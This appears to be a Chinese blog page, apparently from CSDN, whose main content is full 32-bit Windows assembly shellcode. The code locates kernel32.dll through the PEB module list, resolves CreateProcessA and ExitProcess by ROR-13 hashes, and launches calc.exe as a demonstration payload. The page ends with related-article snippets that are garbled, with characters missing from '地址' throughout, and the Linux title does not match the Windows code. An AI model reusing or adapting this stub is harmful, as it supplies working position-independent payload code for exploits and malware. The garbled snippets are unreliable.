linux 获取 基地址,win7/8/10通用获取kernel32基地址的shellcode代码

最新推荐文章于 2022-11-13 18:15:04 发布
最新推荐文章于 2022-11-13 18:15:04 发布
阅读量2k 收藏
点赞数
文章标签: linux 获取 基地址

[Asm] 纯文本查看 复制代码.386

.model flat,stdcall

option casemap:none

include windows.inc

.code

start:

assume fs:nothing

push ebp

xor ecx,ecx

mov edx,dword ptr fs:[30h]

mov eax,dword ptr[edx+0Ch]

mov esi,dword ptr[eax+1Ch]

next_module:

mov ebp,dword ptr[esi+08h]

mov edi,dword ptr[esi+20h]

mov esi,dword ptr[esi]

xor eax,eax

add_kerstr:

add ax,word ptr[edi] ; 累加模块名字符串

cmp word ptr[edi],0

je judge

inc edi

inc edi

jmp add_kerstr

judge:

cmp ax,330h ; up 大写kernel32.dll

je got_it

cmp ax,450h ; low 小写kernel32.dll

jne next_module

got_it:

mov edi,ebp ;取得kernel32.dll基地址

push ebp

mov ebp,esp

sub esp,130h

mov dword ptr[ebp-04h],edi

push 16B3FE72h ;CreateProcessA

push dword ptr[ebp-04h]

call GetApiAddress

mov dword ptr[ebp-20h],eax

push 73E2D87Eh ;ExitProcess

push dword ptr[ebp-04h]

call GetApiAddress

mov dword ptr[ebp-24h],eax

mov dword ptr[ebp-12ch],636c6163h

mov dword ptr[ebp-128h],6578652eh

mov dword ptr[ebp-124h],0h

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

; CreateProcess calc.exe

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

lea edi,dword ptr[ebp-80h]

push edi

lea edi,dword ptr[ebp-80h]

xor eax,eax

mov ecx,44h

push ecx

rep stos byte ptr es:[edi]

pop ecx

lea edi,dword ptr[ebp-70h]

mov dword ptr[ebp-70h],ecx

push edi

push 0

push 0

push 8000000h

push 0

push 0

push 0

lea eax,dword ptr[ebp-12ch]

push eax ; calc.exe

push 0

call dword ptr[ebp-20h] ;CreateProcess

push 0

call dword ptr[ebp-24h] ;ExitProcess

GetApiAddress proc KernelBaseAddress:dword, EncryptNum:dword

LOCAL ReturnValue:dword

pushad

mov edi,KernelBaseAddress

mov eax,dword ptr[edi+3ch]

mov edx,dword ptr[edi+eax+78h] ;IMAGE_EXPORT_DIRECTORY

add edx,edi

mov ecx,dword ptr[edx+18h] ;名称导出的函数总数

mov ebx,dword ptr[edx+20h] ;函数名地址表

add ebx,edi

push edx ;保存edx

NotFound:

jecxz ExitGetApi

dec ecx

mov esi,dword ptr[ebx+ecx*4] ;从最后一个函数名开始查找 Address of names

add esi,edi

xor eax,eax

cdq

LoopChar:

lods byte ptr[esi]

test al,al

je CharEnd

ror edx,0dh ;对字符串进行hash运算

add edx,eax

jmp LoopChar

CharEnd:

cmp edx,EncryptNum

jnz NotFound

pop edx ; 恢复edx

mov ebx,dword ptr[edx+24h] ; 函数序号表 Address of name ordinals

add ebx,edi

mov cx,word ptr[ebx+ecx*2] ; 找到了函数的序号

mov ebx,dword ptr[edx+1ch] ; 函数地址表

add ebx,edi

add edi,dword ptr[ebx+ecx*4] ;由序号得出函数的rva

mov ReturnValue,edi

ExitGetApi:

popad

mov eax,ReturnValue

ret

GetApiAddress endp

end start

霍冉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux 获取 基地,linux - 每个函数加载的glibc基地不同。 - SO中文参考 - www.soinside.com...
weixin_39601794的博客
05-14 769
我试图计算一个二进制文件的库的基地.我有printf,putes ecc的地,然后我减去它的偏移量,得到库的基地.我对printf,putes和signal这样做,但每次我得到的基地都不一样。这个 帖子,但我也无法得到正确的结果。ASLR被禁用。这是我取函数库地的地方。gdb-peda$ x/20wx 0x804b0180x804b018 : 0xf7e05720 0x...
植物大战僵尸针对金币地以及基地寻找详细步骤~包含排除不符合条件的地的讲解,以及如何观察地情况等
weixin_60363168的博客
10-04 1467
植物大战僵尸针对金币地以及基地寻找详细步骤~包含排除不符合条件的地的讲解,以及如何观察地情况等
Windows获取模块基地
langshanglibie的专栏
05-29 7687
获取模块的基地有如下几种方法: 1. 模块句柄就是模块基地(或称模块加载地),直接将模块句柄转换为模块基地 2. 根据模块中的地得到模块句柄,模块句柄就是基地 GetModuleHandleEx 3. 根据模块中的地得到这个地所属模块的基地 但是 SymGetModuleInfoW64 总是运行失败 4. 使用 VirtualQueryEx 函数 5. 根据进程句...
获取Kernel32基地的几种方法
liwei8703的专栏
12-15 1264
1、CreateProcess函数在完成装载应用程序后,会先将一个返回地压入到堆栈顶端,而这个返回地恰好在Kernel32.dll中,利用这个原理我们可以顺着这个返回地按64KB大小往地搜索,那么我们一定可以找到Kernel32模块的基地,废话少说,代码如下:GetK32Base:    mov eax, [esp+04h]     ;得到kernel32的返回地    and
通过进程ID获取基地
tubaluer
01-14 656
下面代码是通过进程ID来获取进程的基地,创建一个进程快照后,读取进程模块,一般情况下第一个模块就是进程的基地,下面的程序通过模块的字符串匹配来找到基地。通过MODULEENTRY32来读取,下面是代码: #include <Windows.h> #include <Tlhelp32.h> #include <stdio.h> HMODULE fnGet...
Win 7下定位kernel32.dll基shellcode编写1
08-03
在Windows操作系统中,尤其是Windows 7环境下,动态定位kernel32.dll的基地对于编写兼容性强的shellcode或恶意软件至关重要。kernel32.dll是Windows系统的核心动态链接库,提供了许多与用户界面、进程和线程管理、...
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
描述中的"此源代码将生成 linux x86的 shellcode"进一步确认了这是一个用于创建shellcode代码库,适用于32位的Linux环境。生成shellcode的过程通常涉及到理解系统调用、内存操作和避开安全机制。 在标签中,...
win32shellcode
06-26
win32shellcode
threadctx.rar_Linux/Unix编程_Visual_C++_
08-11
标题中的"threadctx.rar"可能是指一个关于线程上下文切换的示例程序,而"Linux/Unix编程"和"Visual C++"则表明这个压缩包包含的是在Linux或Unix系统下,使用C++语言进行多线程编程的教程或者实践代码。"shellcode...
Shellcode编译器-C/C++开发
05-26
Shellcode编译器Shellcode Compiler是一个程序,可将C / C ++样式代码编译成一个小的,与位置无关且没有NULL的Shellcode,适用于Windows(x86和x64)和Linux(x86和x64)。 可以调用任何Windows AP Shellcode编译器...
Windows编程 - 获取运行程序的基地
weixin_34220623的博客
02-13 556
获取运行程序的基地(base address) 本文地:http://blog.csdn.net/caroline_wendy/article/details/19162821 加载到进程地空间的每一个可执行文件(exe)或动态链接库(dll), 都包含一个实例句柄(HINSTANCE); (w)WinMain的hInstanceExe参数的实际...
Linux操作系统程序地空间
最新发布
yugongbaocc的博客
11-13 465
漂亮国有个大富翁有10亿美金,有三个私生子,(私生子彼此不知道对方存在),大儿子是工厂老板,二儿子是金融机构的CEO,三儿子在MIT读书,大富翁告诉大儿子,要好好工作,等到自己老了不行后将10亿美金都给他,大富翁又告诉二儿子,要经营好告诉,等自己老了不行时把10亿美金给他,大富翁又告诉小儿子,要好好读书,等自己老了不行时把10亿美金都给他。父进程开辟子进程后,子进程相当于父进程的拷贝,子进程在父进程的虚拟地处开辟,即虚拟地不变,此时父子进程的物理地也是相同的,数据也相同,当子进程更改数据时,
Linux查看进程运行的完整路径方法
funnyPython的博客
04-25 5115
记录这个方法之前,是因为工作中遇到了ps -ef |grep nginx 查看nginx 是通过./nginx 启动的,但是系统上有好几个nginx. 不知道启动了哪个。另外nginx每次启动都是通过/usr/local/nginx/sbin/nginx 来启动的,没有指定配置文件。 但是配置文件会默认指定/opt/ai_nginx下的配置文件。 然后查了一些资料,都是设置的软链接来默认指定配置文件,后来想到可能是编译nginx的时候,把路径写进去了。通过拷贝nginx文件到其他节点执行,nginx -V
关于kernel32基地获取
xrain_zh的专栏
03-27 4985
[-] 关于kernel32基地获取shellcode获取kernel32dll基地获取当前进程的PID 文件名 以及完整路径 关于kernel32基地获取 http://joychou.sinaapp.com/index.php/Reverse/teb.html 一、shellcode获取kernel32.dll基地) 首先了解TEB,
获取固件加载基地的几种方法
mengxp的博客
06-02 1764
IDA加载未知加载地的固件,先加载到0地,然后全部分析 方法1:通过swtich语句的jumptable定位基地 以jumptable作为关键字寻找到任意jumptable,table中的地都是绝对地,减去代码中的偏移就是基地了。最常见的是default case,比如下图: 方法2:F5后通过JUMPOUT语句定位基地,例如 方法3:通过LDR XX, = 语句猜测,例如 LDR R0, =0x403102EC LDR P...
如何获取新创建进程的基地_详解windows如何获取某个文件正在被哪个进程调用方法...
weixin_39708502的博客
12-03 389
概述在windows操作系统中,有时我们关闭程序后,一些相关的进程仍在后台运行,并访问着一些文件,使得我们无法对这些文件及其所属的文件夹进行删除、重命名等操作。此时,如果知道这个文件/文件夹正在被哪个进程使用,就可以用任务管理器结束这个进程,然后就可以对文件进行修改了。(请谨慎决定是否结束关键的、可能会影响系统正常工作的进程。)下面介绍下查看的方法。查看方法1.打开 资源管理器(Ctrl+Shif...
cc2530期末试卷_Zigbee试卷B答案
weixin_29191081的博客
12-29 1072
2015--2016学年第一学期期末考试《Zigbee无线传感网络技术》试卷B(闭卷)答案一、填空题(每空格2分,共30分)1.单点寻、广播寻2.2.4GHz、163.物理层、MAC层4.近距离、低复杂度、低功耗、低成本5.2.4G直接序列扩频6.物理层、MAC层、网络层、应用层二、选择题(每题2分,共20分)1-5BDACD6-10CABDC三、判断题(每题1分,共10分)1、√2、×3、×...
3180105507_唐顺政_final报告1
08-04
本题要求编写一个Shellcode,并将其发送到服务器端执行,如果Shellcode正确,则可以获取Shell权限,否则程序会崩溃。题目的环境位于IP地10.15.201.97,端口号为10000的校内网络中。 首先,我们需要分析给出的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值